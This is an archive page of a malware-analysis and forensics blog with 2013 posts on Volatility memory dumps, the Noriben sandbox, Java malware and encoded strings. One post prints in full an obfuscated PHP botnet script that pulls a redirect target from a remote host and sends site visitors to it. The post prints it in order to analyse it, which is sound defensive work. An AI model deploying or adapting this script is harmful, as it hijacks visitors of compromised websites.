11 October 2013

Dumping Malware Configuration Data from Memory with Volatility

When I first start delving in memory forensics, years ago, we relied upon controlled operating system crashes (to create memory crash dumps) or the old FireWire exploit with a special laptop. Later, software-based tools like regular dd, and win32dd, made the job much easier (and more entertaining as we watched the feuds between mdd and win32dd).

In the early days, our analysis was basically performed with a hex editor. By collecting volatile data from an infected system, we'd attempt to map memory locations manually to known processes, an extremely frustrating and error-prone procedure. Even with the advent of graphical tools such as HBGary Responder Pro, which comes with a hefty price tag, I've found most of my time spent viewing raw memory dumps in WinHex.

The industry has slowly changed as tools like Volatility have gained maturity and become more feature-rich. Volatility is a free and open-source memory analysis tool that takes the hard work out of mapping and correlating raw data to actual processes. At first I shunned Volatility for it's sheer amount of command line memorization, where each query required memorizing a specialized command line. Over the years, I've come to appreciate this aspect and the flexibility it provides to an examiner.

It's with Volatility that I focus the content for this blog post, to dump malware configurations from memory.

For those unfamiliar with the concept, it's rare to find static malware. That is, malware that has a plain-text URL in its .rdata section mixed in with other strings, and other data laid bare in plain sight. Modern malware tends to be more dynamic, allowing for configurations to be downloaded upon infection, or be strategically injected into the executable by its author. Crimeware malware (Carberp, Zeus) tend to favor the former, connecting to a hardcoded IP address or domain to download a detailed configuration profile (often in XML) that is used to determine how the malware is to operate. What domains does it beacon to, on which ports, and with what campaign IDs - these are the items we determine from malware configurations.

Other malware rely upon a known block of configuration data within the executable, sometimes found within .rdata or simply in the overlay (the data after the end of the actual executable). Sometimes this data is in plain text, often it's encoded or encrypted. A notable example of this is in Mandiant's APT1 report on TARSIP-MOON, where a block of encrypted data is stored in the overlay. The point of this implementation is that an author can compile their malware, and then add in the appropriate configuration data after the fact.

As a method to improving the timeliness of malware analysis, I've been advocating for greater research and implementation of configuration dumpers. By identifying where data is stored within the file, and by knowing its encryption routine, one could simply write a script to extract the data, decrypt it, and print it out. Without even running the malware we know its intended C2 communications and have immediate signatures that we can then implement into our network defenses.

While this data may appear as a simple structure in plaintext in a sample, often it's encoded or encrypted via a myriad of techniques. Often this may be a form of encryption that we, or our team, deemed as too difficult to decrypt in a reasonable time. This is pretty common, advanced encryption or compression can often take weeks to completely unravel and is often left for when there's downtime in operations.

What do we do, then? Easy, go for the memory.

We know that the malware has a decryption routine that intakes this data and produces decrypted output. By simply running the malware and analyzing its memory footprint, we will often find the decrypted results in plaintext, as it has already been decrypted and in use by the malware.

Why break the encryption when we can let the malware just decrypt it for us?

16 September 2013

Noriben version 1.4 released

It's been a few months since the last official release of Noriben. The interim time has been filled with a few ninja-edits of updated filters, and wondering what to put in next.

Noriben started out as a simple wrapper to Sysinternals procmon to automatically gather all of the runtime details for malware analysis within a VM. It then filters out all the unnecessary system details until what's left is a fairly concise view of what the malware did to the system while running. It is a great alternative to a dedicated sandbox environment. More details on Noriben can be found here.

Over the months I was ecstatic to hear of organizations using Noriben in various roles. Many had modified the script to use it as an automated sandbox to run alongside their commercial products, which was exactly one of my goals for the script. However, the current requirement of manual interaction was an issue and I saw many ugly hacks of how people bypassed it. The new version should take care of that issue.
This was originally a release for version 1.3, which I pushed up on Friday. However, I received quite a bit of feedback for other new features and so quickly I pushed up version 1.4.

In the new version 1.4, I've introduced a few new features:

  • A non-interactive mode that runs for a specified number of seconds on malware that is specified from the command line
  • The ability to generalize strings, using Windows environment variables
  • The ability to specify an output directory
Non-Interactive Mode
The non-interactive mode was needed for a long time, and I apologize it took some time to implement it, as it was a very easy addition. It can be set in one of two ways:
The beginning of the source has a new line:

timeout_seconds = 0

By setting this to a value other than zero, Noriben will automatically wait that number of seconds to monitor the file system. This can be hardcoded for automated implementations, such as in a sandbox environment.

This value can also be overridden with a command line option of --timeout (-t). When using this argument, Noriben will enable the timeout mode and use the specified number of seconds. This is useful if you have a particularly long runtime sample. Even if Noriben.py was modified to have a 120-second timeout, you can override this on the command line with a much greater value (3600 seconds, for example).

Noriben now also lets you note the malware from the command line, making it completely non-interactive:

Noriben.py --cmd "C:\malware\bad.exe www.badhost.com 80" --timeout 300

This command line will launch bad.exe, with a given command line, for a period of 5 minutes. At such time, Noriben will stop monitoring the malware, but it will continue to run.

Output Directory
An alternate output directory can be specified on the command line with --output. If this folder does not exist, it will be created. If Noriben is unable to create the directory, such as when it doesn't have access (e.g. C:\Windows\System32\), then it will give an error and quit.

String Generalization
One requested feature was to replace the file system paths with the Windows environment variables, to make them generic. Many people copy and paste their Noriben results which may show system-specific values, such as "C:\Documents and Settings\Bob\malware.exe". This string will be generalized to "%UserProfile%\malware.exe".

This feature is turned off by default, but can be enabled by changing a setting in the file:

generalize_paths = False

Or by setting --generalize on the command line.

All in all, these features could be summed up with:

Noriben.py --output C:\Logs\Malware --timeout 300 --generalize --cmd "C:\Malware\evil.exe"

Download Noriben

03 September 2013

Malware Analysis: The State of Java Reversing Tools

In the world of incident response and malware analysis, Java has always been a known constant. While many malware analysts are monitoring more complex malware applications in various languages, Java is still the language of love for drive-by attacks on common end-users. It is usually with certainty that any home user infection with malware such as Zeus, Citadel, Carberp, or ZeroAccess originated through a Java vulnerability and exploit. In typical crimeware (banking/financial theft malware) incidents, one group specializes on the backend malware (e.g. Zeus) while outsourcing the infection and entrenchment to a second group that creates exploit software like BlackHole, Neosploit, and Fiesta.

In many incident responses, I've seen analysts gloss over the Java infection vector as just an end-note. Once they see the final-stage malware on the system they write off the Java component as just a downloader without any real analysis. This creates issues for the times when the Java exploit only partially succeeds resulting in malicious Java JAR files on a system but no Trojan or malware.

Why did it fail? Was the system properly patched to prevent a full infection? Was there a permission setting that stopped the downloader in its tracks? These are the questions that typically force an analyst to begin analyzing Java malware.

I've discussed Java quite a bit on this blog in the past. My Java IDX cache file parser was made for the purpose of identifying files downloaded via Java, be them Windows executables or additional Java JAR files. In that same post I analyzed Java from a Fiesta exploit kit that installed a ZeroAccess trojan onto an analyzed system.

Though Java is not my forte, I've had to face it enough to find that there are many weaknesses and gaps in the tools used for analysis. What I found is that most analysts have been using the same, outdated tools in every case. If the tool fails, they just move on and don't finish their analysis. All the while, new applications are being released that are worthy of note. I felt it worthy to do an annual check-up of the state of analysis tools to display what is available and what weaknesses each holds. There have been similar efforts by others in the past, with the most recent I've found being one in 2010 on CoffeeBreaks, by Jerome.

20 August 2013

Mojibaked Malware: Reading Strings Like Tarot Cards

One notable side effect to working in intrusions and malware analysis is the common and frustrating exposure to text in a foreign language. While many would argue the world was much better when text fit within a one-byte space, dwindling RAM and hard drive costs allowed us the extravagant expense of using TWO bytes to represent each character. The world has yet to recover from the shock of this great invention and modern programmers cry themselves to sleep while fighting with Unicode strings.

For a malware analyst, this typically comes about while analyzing code that's beyond the standard trojan, which typically contains no output. Analyzing C2 clients (servers in other contexts) and decoy documents require being able to identify the correct code page for strings so that they appear correctly, can be attributed to a language, and can then be translated.

ASCII is the range of bytes from 0-255, which occupy one byte of storage. UTF-8 extends upon this by using single-byte where possible, but also allowing variable-length bytes that are mathematically calculated to determine the correct byte to use. If you see a string of text that looks like ASCII, but then randomly contains unknown characters, it is likely UTF-8, such as:


Code pages, UTF-16, and even UTF-32, provide additional challenges by providing little context to the data involved. However, I hope that by this point in 2013 we don't need to continually harp on what Unicode is...

For most analysts, their exposure to Unicode is being confronted with unknown text, and then trying to figure out how to get it back into its original language. This text, when illegible, is known as mojibake, a Japanese term for "writing that changes". The data is correct, and it does mean something to someone, but the wrong encoding is being applied. This results in text that looks, well... wrong.

Most analysts have gotten into the habit of searching for unknown characters then guessing which code page or encoding to apply until they produce something that looks legible. This does eventually work, but is a clumsy science. We all have our favorites to try: GB2312, Big5, Cyrillic, 8859-2, etc. But, let's just keep this short and sweet and show you a tool that your peers likely already know about but forgot to show you.

10 August 2013

How To: Static analysis of encoded PHP scripts

This week, Steve Ragan of CSO Online posted an article on a PHP-based botnet named by Arbor Networks as Fort Disco. As part of his analysis, Ragan posted an oddly obfuscated PHP script for others to tinker with, shown below:

<? $GLOBALS['_584730172_']=Array(base64_decode('ZXJy' .'b' .'3JfcmVw' .'b' .'3J0aW5n'),base64_decode('c' .'2V0X3RpbWV' .'fbGl' .'taXQ' .'='),base64_decode('' .'ZG' .'Vma' .'W' .'5l'),base64_decode('' .'ZGlyb' .'mFtZQ=='),base64_decode('ZGVm' .'aW5l'),base64_decode('' .'d' .'W5saW5r'),base64_decode('Zml' .'sZ' .'V9le' .'G' .'lzdHM='),base64_decode('dG91Y2' .'g='),base64_decode('aXNfd3J' .'p' .'dGFibGU='),base64_decode('dHJ' .'p' .'bQ=='),base64_decode('ZmlsZ' .'V9nZXRf' .'Y29udGVud' .'HM='),base64_decode('dW5s' .'aW5r'),base64_decode('Zm' .'lsZ' .'V9nZXRf' .'Y2' .'9u' .'dGVudHM='),base64_decode('d' .'W5' .'saW5r'),base64_decode('cH' .'JlZ19' .'tYX' .'Rj' .'aA=='),base64_decode('aW1wb' .'G9kZ' .'Q=='),base64_decode('cHJlZ19t' .'YXRja' .'A=='),base64_decode('a' .'W1w' .'bG9k' .'Z' .'Q=='),base64_decode('Zml' .'s' .'ZV' .'9nZXRfY' .'29' .'udGV' .'udH' .'M='),base64_decode('Z' .'m9w' .'ZW4='),base64_decode('' .'ZmxvY' .'2' .'s' .'='),base64_decode('ZnB1' .'dH' .'M='),base64_decode('Zmx' .'vY' .'2s' .'='),base64_decode('Zm' .'Nsb3' .'Nl'),base64_decode('Z' .'mlsZV9leG' .'lzdH' .'M='),base64_decode('dW5zZX' .'JpYWx' .'pemU='),base64_decode('Z' .'mlsZV9nZXRfY29udGVu' .'dHM='),base64_decode('dGlt' .'ZQ' .'=' .'='),base64_decode('Zm' .'ls' .'Z' .'V9n' .'ZX' .'RfY29' .'ud' .'GVu' .'dHM='),base64_decode('d' .'GltZ' .'Q=='),base64_decode('Zm9w' .'ZW4='),base64_decode('Zmx' .'vY2s='),base64_decode('' .'ZnB1dHM='),base64_decode('c2VyaWFsaX' .'pl'),base64_decode('Zm' .'xvY2s='),base64_decode('ZmNsb' .'3N' .'l'),base64_decode('c' .'3Vic3Ry'),base64_decode('' .'a' .'GVhZGVy'),base64_decode('aGVhZGV' .'y')); ?><? function _1348942592($i){$a=Array('aHR0cDovL2dheWxlZWNoZXIuY29tOjgx','cXdlMTIz','cXdlMTIz','MTIzcXdl','Uk9PVA==','Lw==','TE9H','b2xvbG8udHh0','L2lmcmFtZS50eHQ=','dGVzdA==','d29yaw==','Tk8gV09SSywgTk9UIEdFVCBVUkw=','Tk8gV09SSywgTk9UIFdSSVRJQkxF','YWFh','YWFh','YWFh','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','YmJi','YmJi','Y2Nj','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','TnVsbCBjb3VudCBvaw==','RVJST1IgbnVsbCBjb3VudCgo','SFRUUF9VU0VSX0FHRU5U','TVNJRQ==','RmlyZWZveA==','T3BlcmE=','V2luZG93cw==','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','dw==','L2lmcmFtZTIudHh0','aHR0cDovL3lhLnJ1Lw==','c2V0dGluZ3MuanNvbg==','c2V0dGluZ3MuanNvbg==','bGFzdA==','dXJs','bGFzdA==','dXJs','bGFzdA==','c2V0dGluZ3MuanNvbg==','dw==','dXJs','dXJs','aHR0cA==','aHR0cDovLw==','Lw==','SFRUUC8xLjEgNDA0IE5vdCBGb3VuZA==');return base64_decode($a[$i]);} ?><?php $GLOBALS['_584730172_'][0](round(0));$GLOBALS['_584730172_'][1](round(0));$_0=_1348942592(0);if(isset($_GET[_1348942592(1)])AND $_GET[_1348942592(2)]==_1348942592(3)){$GLOBALS['_584730172_'][2](_1348942592(4),$GLOBALS['_584730172_'][3](__FILE__) ._1348942592(5));$GLOBALS['_584730172_'][4](_1348942592(6),ROOT ._1348942592(7));@$GLOBALS['_584730172_'][5](LOG);if(!$GLOBALS['_584730172_'][6](LOG)){@$GLOBALS['_584730172_'][7](LOG);if($GLOBALS['_584730172_'][8](LOG)AND $GLOBALS['_584730172_'][9]($GLOBALS['_584730172_'][10]($_0 ._1348942592(8)))==_1348942592(9)){@$GLOBALS['_584730172_'][11](LOG);echo _1348942592(10);}else{echo _1348942592(11);}}else{echo _1348942592(12);}exit;}if(isset($_GET[_1348942592(13)])AND $_GET[_1348942592(14)]== _1348942592(15)){$_1=$GLOBALS['_584730172_'][12]($_SERVER[_1348942592(16)] ._1348942592(17));echo $_1;exit;}if(isset($_GET[_1348942592(18)])AND $_GET[_1348942592(19)]== _1348942592(20)){if($GLOBALS['_584730172_'][13]($_SERVER[_1348942592(21)] ._1348942592(22))){echo _1348942592(23);}else{echo _1348942592(24);}exit;}if(!empty($_SERVER[_1348942592(25)])){$_2=array(_1348942592(26),_1348942592(27),_1348942592(28));$_3=array(_1348942592(29));if($GLOBALS['_584730172_'][14](_1348942592(30) .$GLOBALS['_584730172_'][15](_1348942592(31),$_2) ._1348942592(32),$_SERVER[_1348942592(33)])){if($GLOBALS['_584730172_'][16](_1348942592(34) .$GLOBALS['_584730172_'][17](_1348942592(35),$_3) ._1348942592(36),$_SERVER[_1348942592(37)])){$_4=@$GLOBALS['_584730172_'][18]($_SERVER[_1348942592(38)] ._1348942592(39));if($_4 == _1348942592(40)or $_4 == false)$_4=round(0);$_5=@$GLOBALS['_584730172_'][19]($_SERVER[_1348942592(41)] ._1348942592(42),_1348942592(43));@$GLOBALS['_584730172_'][20]($_5,LOCK_EX);@$GLOBALS['_584730172_'][21]($_5,$_4+round(0+1));@$GLOBALS['_584730172_'][22]($_5,LOCK_UN);@$GLOBALS['_584730172_'][23]($_5);$_6=$_0 ._1348942592(44);$_7=round(0+300);$_8=_1348942592(45);if(!$_6)exit();$_9=$GLOBALS['_584730172_'][24](_1348942592(46))?$GLOBALS['_584730172_'][25]($GLOBALS['_584730172_'][26](_1348942592(47))):array(_1348942592(48)=>round(0),_1348942592(49)=>$_8);if($_9[_1348942592(50)]<$GLOBALS['_584730172_'][27]()-$_7){if($_9[_1348942592(51)]=$GLOBALS['_584730172_'][28]($_6)){$_9[_1348942592(52)]=$GLOBALS['_584730172_'][29]();$_10=$GLOBALS['_584730172_'][30](_1348942592(53),_1348942592(54));$GLOBALS['_584730172_'][31]($_10,LOCK_EX);$GLOBALS['_584730172_'][32]($_10,$GLOBALS['_584730172_'][33]($_9));$GLOBALS['_584730172_'][34]($_10,LOCK_UN);$GLOBALS['_584730172_'][35]($_10);}}$_11=$_9[_1348942592(55)]?$_9[_1348942592(56)]:$_8;if($GLOBALS['_584730172_'][36]($_11,round(0),round(0+1+1+1+1))!= _1348942592(57))$_11=_1348942592(58) .$_11 ._1348942592(59);$GLOBALS['_584730172_'][37]("Location: $_11");exit;}}}$GLOBALS['_584730172_'][38](_1348942592(60)); ?>

As a fan of obfuscation, this clearly piqued my interest. The initial question was what was contained within all of the Base64 sections, but let's examine this holistically.  At a high level view, there are three distinct sections to this code block, with the beginning of each underlined in the code above. Each can also be identified as beginning with "<?".

28 May 2013

Noriben Version 1.2 released

In a mad rush of programming while on a plane to BSidesNOLA, and during the conference, I completed a large number of updates, requests, and demands for Noriben.

As a basic malware analysis sandbox, Noriben was already doing a great job in helping people analyze malware more quickly and efficiently. However, it had its bugs that hurt a few outlier cases. Using submitted feedback (through email, twitter, oral, and death threats) I believe that the major issues have been fixed and that the most-needed features have been added.

New Improvements:

  • Timeline support -- Noriben now automatically generates a "_timeline.csv" report that notes all activity in chronological order, with fields for local time and a grouping category. Feedback is welcome for ways to improve this output. For example:
8:16:19,Network,UDP Send,hehda.exe,2520,
8:16:19,Registry,RegDeleteValue,hehda.exe,2520,HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender
  • Tracks registry deletion attempts -- Older versions only tracked successful deletions to the registry, assuming that the keys and values existed. Now, it logs even when the keys don't exist. This opened up a large amount of data that was previously filtered out, such as ZeroAccess removing the services for Windows Defender and Microsoft Update (which weren't running on my analysis VM).
  • Large CSV support -- The old versions of Noriben read the entire procmon CSV into memory and then parsed them for results. This created numerous Out of Memory issues with very large sample files. The new version fixes this by only reading in the data one line at a time.
  • Parse Procmon PMLs -- PML files are the binary database used to store the native events during capture. These are converted to CSVs during runtime, but a number of users have years worth of saved PMLs for previous malware samples. Now, Noriben can just parse an existing PML without having to re-run the malware.
  • Alternate Filter files -- Previous versions of Noriben required that you use one filter file, ProcmonConfiguration.PMC, to store your filters. This created issues for users who maintained multiple filters. A new command line option has been added to specify a filter file. This can be used in conjunction with the "-p" PML parsing option to rescan an existing PML with new filters.
  • Global Blacklists -- There was a need for a global blacklist, where items contained in it (namely executables) would be blocked from all blacklists. That allows for a blacklisted item that doesn't have to be manually added to each and every list. 
  • Error Logging -- In a few unusual cases, Noriben fails to parse an event item from the CSV. While Noriben contains proper error handling to catch these issues, it just drops them and moves on. As these events may contain important items, they are now stored in raw at the end of the Noriben text report for manual analysis. If something looks amiss, and they are extremely important items, the list can be emailed to me for analysis and better handling in future versions.
  • Compartmentalized sections -- This is mostly a back-end, minor feature, All events are now grouped into separate lists for Process, File, Registry, and Network. 

General fixes:

  • Changed "open file" command for Mac OS X to 'open'. OS X is tagged as 'posix'. This allows for Noriben to parse files from a Mac interface, but this is not recommended. Parsing files on a system other than the infected means that system environment variables, such as %UserProfile%, will not be identified correctly.
Noriben has changed its command line arguments, dropped the '-r' (rescan CSV) and introduced more specific arguments per each file type, '-c' (CSV), '-p' (PML), and '-f' (filter):

--===[ Noriben v1.2 ]===--
--===[   @bbaskin   ]===--

usage: Noriben.py [-h] [-c CSV] [-p PML] [-f FILTER] [-d]

optional arguments:
  -h, --help                   show this help message and exit
  -c CSV, --csv CSV            Re-analyze an existing Noriben CSV file [input file]
  -p PML, --pml PML            Re-analyze an existing Noriben PML file [input file]
  -f FILTER, --filter FILTER   Alternate Procmon Filter PMC [input file]
  -d                           Enable debug tracebacks

05 May 2013

31337 Password Guessing

In the digital forensics and incident response we tend to deal with encrypted containers on a regular basis. With encrypted containers means dealing with various styles and iterations of passwords used to access these containers. In a large-scale incident response, it's not uncommon to have a dedicated spreadsheet that just maintains what passwords open what volumes, with the spreadsheet itself password protected.

But, what happens when you forget that password?

The common problems I've run into have been trying to access a volume months, sometimes years, after the fact. In civil cases, we've been surprised to see a case resurface years after we thought it had been settled, and rushed back to open old archives. This inevitably leaves us asking "Did I use a zero or an `O` for that byte?"

By making a spreadsheet of every possible password permutation, we've always been able to get to the data, but the issue does occasionally pop up.

For instance, in an intrusion-related case, a case agent used their agency's forensics group to seize a laptop drive. The drive contained a user file encrypted with TrueCrypt. Through the telephone-game, the owner says the password is XooXooX, which the responder writes as xooxoox, which is transcribed by the case agent as X00x00x. Attempts to decrypt the volume fail, and being that the original responder has now moved on and no notes were kept, all we're told is that the password is "something like ....".

Reasonable and resourceful shops would then write custom password filters to throw into software like PRTK, using DNA clustering to quickly determine the password. However, you don't work in a reasonable and resourceful shop. You can't afford PRTK. What do you do? Write a password guesser in Python that just uses TrueCrypt.

29 April 2013

Presentation Archive

Below are a series of presentations I've given over the years, though not a fully inclusive list. Many are too sensitive (FOUO/LES/S/TS/SAP/EIEIO) to store, and others have been lost to digital decay. But, the remainder have been recovered and digitally remastered for your enjoyment.

Walking the Green Mile: How to Get Fired After a Security Incident:

Abstract: Security incidents targeting corporations are occurring on a daily basis. While we may hear about the large cases in the news, network and security administrators from smaller organization quake in fear of losing their jobs after a successful attack of their network. Simple bad decisions and stupid mistakes in responding to a data breach or network intrusion are a great way to find yourself new employment. In this talk I'll show you in twelve easy steps how to do so after, or even during, a security incident in your company.
Notable Venues: Derbycon 1.0, Defcon Skytalks, BSides Las Vegas

Below is a video feed of the talk given at the first ever Derbycon. It was an early morning slot, and I was somehow blissfully unaware that I was being recorded, which may be why I feel it was the best recording of the talk.

Intelligence Gathering Over Twitter:

This was a basic-level presentation geared for a law enforcement audience. It taught the basics of how to use Twitter but also delved into specialized tools to collect and analyze large amounts of data, to help infer relationships and associations. This slide deck is slightly redacted, as much of the good stuff was given orally in the presentation.
Notable Venues: DoD Cyber Crime Conference

Information Gathering Over Twitter from Brian Baskin

Malware Analysis: Java Bytecode

Abstract: This was a short talk given to NoVA Hackers soon after working through a Zeus-related incident response. The Javascript used to drop Zeus on the box had a few layers of obfuscation that I had not seen discussed publicly on the Internet. This was was originally given unrecorded and only published a year later.

P2P Forensics: 

Abstract: Years ago I began working on an in-depth protocol analysis talk about BitTorrent so that traffic could be monitored. This grew into a BitTorrent forensics talk which grew into an overall P2P Forensics talk. At one point, it was a large two-hour presentation that I had to gently trim down to an hour. Given at multiple venues, each was modified to meet that particular audience (administrators, criminal prosecutors, military).
Notable Venues: GFIRST, DoD Cyber Crime Conference, DojoCon, Virginia State Police Cyber Workshop, USAF ISR Information Security Conference, USDoJ CCIPS Briefing, AFOSI Computer Crime Workshop

The only video recording of the talk, recorded at DojoCon 2010, for a technical audience.

Brian Baskin, @bbaskin P2P Forensics from Adrian Crenshaw on Vimeo.

Casual Cyber Crime:

Abstract: We're living in an age of devices and applications that push the boundaries of dreams, an age of instant gratification, but also the age of Digital Rights Management and Copyright laws. With questionably illegal modifications becoming simple enough for children to use, where does the line get drawn between squeezing more functionality out of your digital devices and software and breaking felony laws? In this talk attendees will explore the justifications and rationales behind the use of questionable hardware and software modifications and understand the mentality behind why their use is rapidly catching on in the general population.
Notable Venues: TechnoForensics

22 April 2013

Ghetto Forensics!

While I have maintained a blog on my personal website (www.thebaskins.com) for many years, the process of creating new posts on it has become cumbersome over time. As I perform more technical posts, they felt out of place on a personal site. After some weeks of contemplation, I've forked my site to place my new technical content on a site for itself, here, at Ghetto Forensics.

Why Ghetto Forensics? Because this is the world in which we operate in. For every security team operating under a virtual unlimited budget, there are a hundred that are cobbling together a team on a shoestring budget using whatever tools they can. This is the world I've become used to in my long career in security, where knowledgeable defenders make do as virtual MacGyvers: facing tough problems with a stick of bubble gum,  a paperclip, and some Python code.

Many don't even realize they're in such a position. They've created an environment where they are continually on the ball and solving problems, until they are invited to a vendor demonstration where a $10,000 tool is being pitched that does exactly what their custom script already performs. Where an encrypted file volume isn't met with price quotes, but ideas such as "What if we just ran `strings` on the entire hard drive and try each as a password?".

Ghetto forensics involves using whatever is at your disposal to get through the day. Ghetto examiners don't have the luxury of spending money to solve a case, or buying new and elaborate tools. Instead, their focus is to survive the day as cheaply and efficiently as possible.

Have a tough problem? No EnScript available? Then work through five different, free tools, outputting the results from one to another, until you receive data that meets your demands. Stay on top of the tools, constantly reading blog posts and twitter feeds of others, to see what is currently available. Instead of swishing coffee in a mug while waiting for keyword indexing, having the luxury of weeks to perform an examination, you are multitasking and updating your procedures to go directly after the data that's relevant to answering the questions. Fix your environment so that you can foresee and tackle that mountain of looming threats instead of constantly being responsive to incidents months after the fact.

These are many of the ideals I've learned from and taught others. While others adopted the mentality of posting questions to vendors and waiting for a response, we've learned to bypass corporate products and blaze our own trails. When I helped develop a Linux Intrusions class in 2002, the goal was to teach how to investigate a fully-fledged network intrusion on their zero-dollar budgets. We used Sleuthkit, and Autopsy, and OpenOffice. We created custom timelines and used free spreadsheet (Quattro) to perform filtering and color-coding. Students learned how to take large amounts of data and quickly cull it down to notable entries using grep, awk, and sed. And, when they returned to their home offices, they were running in circles around their co-workers who relied upon commercial, GUI applications. Their task became one of not finding which button to click on, but what data do I need and how do I extract it.

Join me as we celebrate Ghetto Forensics, where being a Ghetto Examiner is a measure of your ingenuity and endurance in a world where you can't even expense parking.

Noriben version 1.1 Released

I've made available the latest version of Noriben with some much-needed updates.

The greatest update is a series of added filters that dramatically help to reduce false positive items in the output. This was missing from the first release due to an oversight on my part, and an unknown usability feature in Procmon. I use my own personal Procmon filters for malware analysis, which are not provided for users to download. The mistake was that I was under the assumption that removing this filter file would prevent Procmon from using them and would provide me the output that everyone else would see. That was a wrong assumption; Procmon stores a backup in the registry.

After seeing the output produced when @TekDefense ran Noriben, I quickly realized the sheer amount of items that should not be in the report, and rushed to fix this.

While updating the filters, I applied a few new improvements under the hood in how filters were applied. Primarily, filters now support regular expressions, though I have not implemented any at this point. Additionally, filters can now include environment variables. So, instead of hard-coding "C:\Users\Brian\AppData\...", which would change on every single machine, a filter can read "%UserProfile%\AppData\...". This lends to greater portability of the script, allowing it to use the same filter set on any machine with no changes.

The new version of Noriben, version 1.1, is available on GitHub here.

If you have any errors or unusual items that you want to report, email the PML/CSV/TXT files (ZIP is fine) to brian -=[at]=- thebaskins -=[dot]=- com. Additionally, if you have any notable filter items that you would like to share, I will review them and, if helpful, add to the trunk with credit to you.

Update (30 Apr 13): I made a gross failure in testing the Regular Expression feature in version 1.1. In short, it didn't work. That's been rectified, and it's working perfectly. I also added some rules on how to create new rules, to meet the requirements of the regular expression parser.

09 April 2013

Noriben - The Portable Sandbox System

Noriben is a Python-based script that works in conjunction with SysInternals Procmon to automatically collect, analyze, and report on runtime indicators of malware and suspicious system behavior. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the system's activity after running an attack.

While there are many well developed and fully featured sandboxes, such as Cuckoo, they all have various limitations that impacted the way I do malware analysis. Noriben was written specifically to fill these gaps. Noriben is an ideal solution for many unusual malware instances, such as those that would not run from within a standard sandbox environment. These files perhaps required command line arguments, or had VMware/OS detection that had to be actively debugged, or extremely long sleep cycles.

Bypassing Anti-Sandboxing

One common instance to use Noriben is with malware that is VM and Sandbox aware. Throwing the sample into any existing sandbox will most likely result in a report with no artifacts as the malware didn't run. Some applications look for manual user activity, such as mouse movement and clicking. Other malware may infect the WinHTTP stack and only trigger when a web browser is used. By just launching Noriben in the background, all of the system behavior is logged as the analyst manually controls the system to give the impression of a normal user. Once the file has been detonated, the results can be reviewed as a standard sandbox report.

Command Line-Based Applications

In rarer cases are malware samples that require command line options in order to run. Launching these executables within a sandbox would immediately fail as the malware does not have the arguments to operate. However, an analyst manually controlling the malware while Noriben is running can quickly gather all system artifacts from various command line options.

General Attack Artifacts

Even more interesting, Noriben has been used by pentesters to determine what system artifacts exist when launching an attack against a system or service. By monitoring files created or registry entries modified, a security analyst can determine all artifacts that result from running an attack, a PowerShell command, or a Javascript-based web page.

Perfect for Malware Analysis on the Road

It's commonly a scenario where an analyst may have a proper sandbox environment in a home lab but on the road has only a laptop. In working with various Sales Engineers and Support individuals from security companies, there were many times where they needed an immediate malware answer out of their hotel room. Noriben was designed to be used with little effort, little setup, and little maintenance. Even if you don't have a dedicated malware VM, any Windows VM will do! Even <a snapshot copy of> your corporate environment!

How to Run Noriben

Noriben is simply a Python wrapper to SysInternal's Process Monitor (procmon.exe). Procmon is a system artifact collection tool that stores millions of events into a massive database. However, for many analysts, this turns into information overload. Noriben works as a filtering system to remove all activity that's known to be from legitimate activity. Therefore, whatever is left over is very likely to be related to suspicious activity from malware or an attack.

Simply run Noriben.py and wait for it to start listening to the system. Once prompted, run your malware or perform your attack actions. When the malware or attack has reached a point of activity necessary for analysis, stop Noriben by pressing Ctrl-C. Noriben will then stop the logging, gather all of the data, and process a report for you.

Noriben will actually produce multiple reports: a readable text document, a CSV separated by activity type, and a full timeline CSV.

Noriben in Action

In my last blog post, I showed one of my recent tools for parsing Java IDX files, a forensic byproduct of Java-based malware infections. In that post we talked about the first-stage malware attack which was used solely to drop a file named hehda.exe to the user's Temporary folder. What was that executable and what does it do? Let's turn to Noriben:

12 January 2013

Java Malware - Identification and Analysis

DIY Java Malware Analysis

Parts Required: AndroChef ($) or JD-GUI (free), My Java IDX Parser (in Python), Malware Samples
Skill Level: Beginner to Intermediate
Time Required: Beginner (90 minutes), Intermediate (45 minutes), Advanced (15 minutes)

Java has once again been thrown into the limelight with another insurgence of Java-based drive-by malware attacks reminiscent of the large-scale BlackHole exploit kits seen in early 2012. Through our cmdLabs commercial incident response and forensics team at Newberry Group, I've had the opportunity to perform numerous investigations into data breaches and financial losses due to such malware being installed.
Based on my own experience in Java-related infections, and seeing some very lackluster reports produced by others, I've decided to write a simple How-To blog post on basic Java malware analysis from a forensic standpoint. Everyone has their own process, this is basically mine, and it takes the approach of examining the initial downloaded files, seen as Java cached JAR and IDX files, examining the first-stage Java malware to determine its capabilities, and then looking for the second-stage infection.

Java Cached Files

One critical step in any Java infection is to check for files within the Java cache folder. This folder stores a copy of each and every Java applet (JAR) downloaded as well as a metadata file, the IDX file, that denotes when the file was downloaded and from where. These files are stored in the following standard locations:
  • Windows XP: %AppData%\Sun\Java\Deployment\Cache
  • Windows Vista/7/8: %AppData%\LocalLow\Sun\Java\Deployment\Cache
This folder contains numerous subdirectories, each corresponding to an instance of a downloaded file. By sorting the directory recursively by date and time, one can easily find the relevant files to examine. These files will be found auto-renamed to a random series of hexadecimal values, so don't expect to find "express.jar", or whatever file name the JAR was initially downloaded as.

Java IDX Files

In my many investigations, I've always relied upon the Java IDX files to backup my assertions and provide critical indicators for the analysis. While I may know from the browser history that the user was browsing to a malicious landing page on XYZ.com, it doesn't mean that the malware came from the same site. And, as Java malware is downloaded by a Java applet, there will likely be no corresponding history for the download in any web browser logs. Instead, we look to the IDX files to provide us this information.

The Java IDX file is a binary-structured file, but one that is reasonably readable with a basic text editor. Nearly all of my analysis is from simply opening this file in Notepad++ and mentally parsing out the results. For an example of this in action, I would recommend Corey Harrell's excellent blog post: "(Almost) Cooked Up Some Java". This textual data is of great interest to an examiner, as it notes when the file was downloaded from the remote site, what URL the file originated from, and what IP address the domain name resolved to at the time of the download.

I was always able to retrieve the basic text information from the file, but the large blocks of binary data always bugged me. What data was I missing? Were there any other critical indicators in the file left undiscovered?

Java IDX Parser

